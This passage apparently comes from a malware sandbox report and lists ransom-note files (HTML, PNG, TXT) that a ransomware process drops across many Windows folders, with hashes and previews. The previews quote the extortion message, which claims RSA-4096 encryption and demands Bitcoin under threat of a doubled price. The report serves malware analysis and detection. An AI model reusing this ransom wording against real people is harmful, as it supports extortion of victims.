                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\WindowsHolographicDevices\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\WindowsHolographicDevices\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\WindowsHolographicDevices\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\dbg\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\dbg\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\dbg\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\regid.1991-06.com.microsoft\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\regid.1991-06.com.microsoft\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\regid.1991-06.com.microsoft\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\Users\Public\Documents\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\Users\Public\Documents\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\Users\Public\Documents\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\Users\Public\Music\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
